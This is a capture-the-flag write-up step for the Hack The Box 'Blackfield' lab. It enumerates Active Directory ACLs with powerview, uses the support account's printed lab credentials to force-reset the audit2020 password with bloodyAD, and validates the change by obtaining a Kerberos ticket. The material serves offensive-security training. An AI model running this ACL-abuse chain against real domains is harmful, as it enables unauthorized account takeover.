InfoSec LAB

ForceChangePassword

As previously enumerated through bloodhound, the support user is able to change the password of the audit2020 account

┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ KRB5CCNAME=support@dc01.blackfield.local.ccache powerview 'BLACKFIELD.LOCAL/@dc01.blackfield.local' -k --no-pass --use-ldap --dc-ip $IP -q 'Get-ObjectAcl CN=AUDIT2020,CN=USERS,DC=BLACKFIELD,DC=LOCAL -ResolveGUIDs' -d
 
[...REDACTED...]
 
objectdn                    : CN=audit2020,CN=Users,DC=BLACKFIELD,DC=local
objectsid                   : S-1-5-21-4194615774-2175524697-3563712290-1103
acetype                     : ACCESS_ALLOWED_OBJECT_ACE
aceflags                    : None
access mask                 : ControlAccess
objectaceflags              : ACE_OBJECT_TYPE_PRESENT
objectacetype               : Change Password (ab721a53-1e2f-11d0-9819-00aa0040529b)
inheritancetype             : None
securityidentifier          : support (S-1-5-21-4194615774-2175524697-3563712290-1104)
 
objectdn                    : CN=audit2020,CN=Users,DC=BLACKFIELD,DC=local
objectsid                   : S-1-5-21-4194615774-2175524697-3563712290-1103
acetype                     : ACCESS_ALLOWED_OBJECT_ACE
aceflags                    : None
access mask                 : ControlAccess
objectaceflags              : ACE_OBJECT_TYPE_PRESENT
objectacetype               : Reset Password (00299570-246d-11d0-a768-00aa006e0529)
inheritancetype             : None
securityidentifier          : support (S-1-5-21-4194615774-2175524697-3563712290-1104)
 
objectdn                    : CN=audit2020,CN=Users,DC=BLACKFIELD,DC=local
objectsid                   : S-1-5-21-4194615774-2175524697-3563712290-1103
acetype                     : ACCESS_ALLOWED_ACE
aceflags                    : None
activedirectoryrights       : ReadControl,ReadProperties,ListChildObjects
access mask                 : 0x20014
inheritancetype             : None
securityidentifier          : support (S-1-5-21-4194615774-2175524697-3563712290-1104)

using the python implementation of powerview, I can list out the ACL of the audit2020 account, and there are 3 ACEs grant to the support user regarding the ForceChangePassword privilege

┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ bloodyAD -d BLACKFIELD.LOCAL -u 'support' -p '#00^BlackKnight' --host dc01.blackfield.local set password CN=AUDIT2020,CN=USERS,DC=BLACKFIELD,DC=LOCAL Qwer1234
[+] Password changed successfully!

while there are many ways to change the password of a user, i will be using bloodyad

Validation

┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ impacket-getTGT BLACKFIELD.LOCAL/audit2020@dc01.blackfield.local -k -dc-ip $IP 
Impacket v0.11.0 - Copyright 2023 Fortra
 
Password: Qwer1234
[*] Saving ticket in audit2020@dc01.blackfield.local.ccache

Validated TGT saved for the audit2020 account

InfoSec LAB

Explorer

Blackfield_ForceChangePassword

ForceChangePassword

Validation

Interactive Graph View

Table of Contents

Backlinks